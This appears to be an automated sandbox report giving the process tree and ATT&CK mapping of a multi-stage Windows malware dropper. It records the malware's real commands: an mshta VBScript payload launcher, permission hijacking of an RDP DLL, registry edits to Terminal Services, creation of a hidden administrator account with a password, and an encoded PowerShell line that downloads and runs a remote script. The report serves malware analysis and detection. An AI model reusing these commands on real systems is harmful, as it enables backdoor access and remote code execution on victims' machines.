C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe3⤵
- Loads dropped DLL
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe4⤵
- Executes dropped EXE
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe3⤵
- Loads dropped DLL
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09977fdc12334.exeWed09977fdc12334.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:320 -
C:\Users\Admin\Pictures\Adobe Films\uGddXyqbmjdbc7Sq8dP6sCg_.exe"C:\Users\Admin\Pictures\Adobe Films\uGddXyqbmjdbc7Sq8dP6sCg_.exe"5⤵
- Executes dropped EXE
PID:2552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 15725⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe3⤵
- Loads dropped DLL
PID:828 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed094c47c32b.exeWed094c47c32b.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:432 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))5⤵PID:2184
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe3⤵
- Loads dropped DLL
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09abf83d9c2.exeWed09abf83d9c2.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09abf83d9c2.exe" -u5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2176
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe3⤵
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe3⤵
- Loads dropped DLL
PID:288 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:908 -
C:\Users\Admin\AppData\Local\Temp\is-CF7Q7.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-CF7Q7.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$10188,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09d27135e5a8b3b.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09d27135e5a8b3b.exe" /SILENT6⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\is-CO32M.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-CO32M.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$20188,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09d27135e5a8b3b.exe" /SILENT7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\is-OKKDQ.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-OKKDQ.tmp\postback.exe" ss18⤵
- Executes dropped EXE
PID:2336
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone3⤵
- Loads dropped DLL
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1952 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09cfb2f9758281d8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09cfb2f9758281d8.exe" & exit5⤵PID:1120
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09cfb2f9758281d8.exe" /f6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F4CA.exeC:\Users\Admin\AppData\Local\Temp\F4CA.exe1⤵
- Executes dropped EXE
PID:3584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵PID:4068
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ih_flcnn.cmdline"3⤵PID:3580
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES15C3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC15C2.tmp"4⤵PID:592
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵PID:2020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵PID:1432
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2440
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3964
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:704
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2460
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2636
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3300
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2488
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:832
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1956
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3752
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2532
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:2768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Executes dropped EXE
PID:1296
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵PID:1532
-
C:\Windows\system32\net.exenet start rdpdr5⤵PID:4004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3640
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2352
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1872
-
C:\Windows\system32\net.exenet start TermService5⤵PID:2448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2812
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1FDA9082-13F1-4AD5-9C69-33481F34E568} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3628
-
C:\Users\Admin\AppData\Roaming\wrhbijiC:\Users\Admin\AppData\Roaming\wrhbiji2⤵PID:4060
-
-
C:\Users\Admin\AppData\Roaming\wrhbijiC:\Users\Admin\AppData\Roaming\wrhbiji2⤵PID:3772
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:2404
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Executes dropped EXE
PID:3124 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3436
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc hHDc0UXV /add1⤵PID:3764
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc hHDc0UXV /add2⤵PID:2392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc hHDc0UXV /add3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1724
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:4092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:276
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD1⤵PID:1260
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD2⤵PID:1524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD3⤵PID:3204
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:3388
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3848
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc hHDc0UXV1⤵PID:2968
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc hHDc0UXV2⤵PID:1868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc hHDc0UXV3⤵PID:3912
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:3788
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:4064
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3972
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:584
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3268
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵PID:2896
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Web Service
1